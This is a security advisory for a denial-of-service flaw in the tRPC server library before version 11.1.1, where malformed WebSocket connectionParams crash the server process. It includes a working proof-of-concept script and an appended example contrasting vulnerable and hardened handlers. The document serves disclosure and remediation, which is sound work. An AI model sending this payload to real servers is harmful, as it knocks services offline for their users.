Uncaught Exception Affecting @trpc/server package, versions <11.1.1


Severity

high (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.1% (29th percentile)

  • Snyk ID: SNYK-JS-TRPCSERVER-10060256
  • Published: 8 May 2025
  • Disclosed: 24 Apr 2025
  • Credit: Luke Childs

Introduced: 24 Apr 2025

CVE-2025-43855
CWE-248

How to fix?

Upgrade @trpc/server to version 11.1.1 or higher.

Overview

@trpc/server is the tRPC server library.

Affected versions of this package are vulnerable to Uncaught Exception via the createCtxPromise function. An attacker can cause the server to crash by sending malformed connectionParams during the WebSocket connection setup. Specifically, the parseConnectionParams function throws an error for malformed input, which is caught but then incorrectly re-thrown within the WebSocket adapter's createCtxPromise function. This re-thrown error becomes an uncaught exception in the WebSocket message event context, leading to the termination of the entire tRPC server process.

Note: This is only exploitable if the server has WebSockets enabled and uses the createContext method.

PoC

#!/usr/bin/env node

const TARGET = 'ws://localhost:3000'

// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation
const MALICIOUS_CONNECTION_PARAMS = JSON.stringify({
  method: "connectionParams",
  data: { invalidConnectionParams: null },
});

// Open a connection to the target
const target = `${TARGET}?connectionParams=1`;
console.log(`Opening a WebSocket to ${target}`);
const socket = new WebSocket(target);

// Wait for the connection to be established
socket.addEventListener("open", () => {
  console.log("WebSocket established!");

  // Sends a message to the WebSocket server.
  console.log(`Sending malicious connectionParams`);
  socket.send(MALICIOUS_CONNECTION_PARAMS);
  console.log(`Done!`);
});

// Handle errors
socket.addEventListener("error", () => console.log("Error opening WebSocket"));
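The failure mode described in the Overview, modelled as an added example (this is not tRPC's code and not the 11.1.1 fix): a message handler that re-throws the parse error, beside one that reports the failure to the offending client and closes only that socket, both driven through a constructed fake socket. `parseConnectionParams`, `vulnerableOnMessage`, `hardenedOnMessage`, `FakeSocket` and `deliver` are constructed names.

```javascript
// Added example, not tRPC's code: a constructed stand-in for parseConnectionParams (flat record of strings).
function parseConnectionParams(data) {
  if (data === null || typeof data !== 'object' || Array.isArray(data)) throw new TypeError('connectionParams must be an object');
  for (const [key, value] of Object.entries(data)) {
    if (typeof value !== 'string') throw new TypeError(`connectionParams.${key} must be a string`);
  }
  return data;
}

// Vulnerable shape: the parse error is caught, then re-thrown out of the 'message' listener.
function vulnerableOnMessage(socket, raw) {
  const msg = JSON.parse(raw);
  if (msg.method !== 'connectionParams') return;
  try {
    socket.ctx = parseConnectionParams(msg.data);
  } catch (cause) {
    throw new Error('invalid connectionParams', { cause }); // escapes the listener
  }
}

// Hardened shape: the failure becomes an error frame plus a close for that one client.
function hardenedOnMessage(socket, raw) {
  try {
    const msg = JSON.parse(raw);
    if (msg.method !== 'connectionParams') return;
    socket.ctx = parseConnectionParams(msg.data);
  } catch (err) {
    socket.send(JSON.stringify({ error: { message: err.message } }));
    socket.close(1008); // 1008 = policy violation; the process keeps serving other clients
  }
}

// Fake socket whose emit() propagates listener exceptions the way EventEmitter does.
class FakeSocket {
  constructor() { this.listeners = []; this.sent = []; this.closeCode = null; this.ctx = null; }
  on(_event, fn) { this.listeners.push(fn); }
  emit(data) { for (const fn of this.listeners) fn(data); }
  send(frame) { this.sent.push(frame); }
  close(code) { this.closeCode = code; }
}
// Delivers one frame and reports whether an exception escaped the listener (the process-killing path).
function deliver(handler, raw) {
  const socket = new FakeSocket();
  socket.on('message', (data) => handler(socket, data));
  try { socket.emit(raw); return { crashed: false, socket }; }
  catch (error) { return { crashed: true, socket, error }; }
}
// Constructed payload with the same shape as the PoC's connectionParams message.
const MALFORMED = JSON.stringify({ method: 'connectionParams', data: { invalidConnectionParams: null } });
```

In a real server the `crashed: true` path is the uncaught exception the advisory describes; the hardened handler turns the same input into one closed connection.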
